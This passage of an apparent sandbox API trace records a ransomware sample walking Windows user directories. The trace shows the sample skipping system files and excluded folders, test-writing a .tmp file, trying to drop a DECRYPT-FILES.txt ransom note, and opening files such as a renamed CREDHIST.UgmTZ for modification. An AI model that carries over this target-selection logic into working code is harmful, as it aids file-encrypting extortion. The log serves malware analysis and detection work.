ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.355] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.355] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.356] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.356] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.356] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0186.356] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0186.356] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0186.356] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.356] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0186.356] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0186.356] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.356] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="autorun.inf") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="boot.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="desktop.ini") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="iconcache.db") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="bootsect.bak") returned 1 [0186.356] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat.log") returned 1 [0186.357] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="thumbs.db") returned 1 [0186.357] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Bootfont.bin") returned 1 [0186.357] lstrlenW (lpString="Windows Media Player.lnk") returned 24 [0186.357] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.357] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0186.357] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.357] CloseHandle (hObject=0xffffffff) returned 0 [0186.357] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar\\", cAlternateFileName="")) returned 0 [0186.357] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.357] CloseHandle (hObject=0xffffffff) returned 0 [0186.357] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0186.357] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.357] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="autorun.inf") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot.ini") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="desktop.ini") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="iconcache.db") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootsect.bak") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ntuser.dat.log") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="thumbs.db") returned 1 [0186.358] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Bootfont.bin") returned 1 [0186.358] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0186.358] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.358] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0186.358] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.358] CloseHandle (hObject=0xffffffff) returned 0 [0186.358] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch\\", cAlternateFileName="QUICKL~1")) returned 0 [0186.358] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.358] CloseHandle (hObject=0xffffffff) returned 0 [0186.358] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0186.358] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0186.358] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0186.358] lstrcatW (in: lpString1="Protect", lpString2="\\" | out: lpString1="Protect\\") returned="Protect\\" [0186.358] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Protect\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Program Files") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch=":\\Windows") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Games\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\All Users") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.358] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.359] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="AhnLab") returned 0x0 [0186.359] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.359] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0186.359] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.359] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\0a16c9.tmp") returned 62 [0186.359] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.365] GetLastError () returned 0x5 [0186.365] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0186.365] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.365] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt") returned 69 [0186.365] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.366] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0186.366] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*" [0186.366] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.367] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.367] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.367] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0a8d820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST.UgmTZ", cAlternateFileName="CREDHI~1.UGM")) returned 1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="DECRYPT-FILES.txt") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="autorun.inf") returned 1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="boot.ini") returned 1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="desktop.ini") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="ntuser.dat") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="iconcache.db") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="bootsect.bak") returned 1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="ntuser.dat.log") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="thumbs.db") returned -1 [0186.367] lstrcmpiW (lpString1="CREDHIST.UgmTZ", lpString2="Bootfont.bin") returned 1 [0186.367] lstrlenW (lpString="CREDHIST.UgmTZ") returned 14 [0186.367] lstrcmpiW (lpString1="UgmTZ", lpString2="lnk") returned 1 [0186.368] lstrcmpiW (lpString1="UgmTZ", lpString2="exe") returned 1 [0186.368] lstrcmpiW (lpString1="UgmTZ", lpString2="sys") returned 1 [0186.368] lstrcmpiW (lpString1="UgmTZ", lpString2="dll") returned 1 [0186.368] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned 51 [0186.368] lstrlenW (lpString="CREDHIST.UgmTZ") returned 14 [0186.368] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\" [0186.368] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST.UgmTZ" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.UgmTZ") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.UgmTZ" [0186.368] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.368] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.UgmTZ" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.ugmtz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.368] CloseHandle (hObject=0x0) returned 0 [0186.368] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.368] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a8d820, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a8d820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a8d820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.368] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.368] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0186.368] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0186.369] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0186.369] lstrcatW (in: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="\\" | out: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="S-1-5-21-3111613574-2524581245-2586426736-500\\" [0186.369] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Program Files") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch=":\\Windows") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Games\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\All Users") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="AhnLab") returned 0x0 [0186.369] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.369] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0186.369] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.369] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\0a16c9.tmp") returned 108 [0186.369] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.375] GetLastError () returned 0x5 [0186.375] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0186.375] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.375] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt") returned 115 [0186.375] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.377] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0186.377] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0186.377] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, 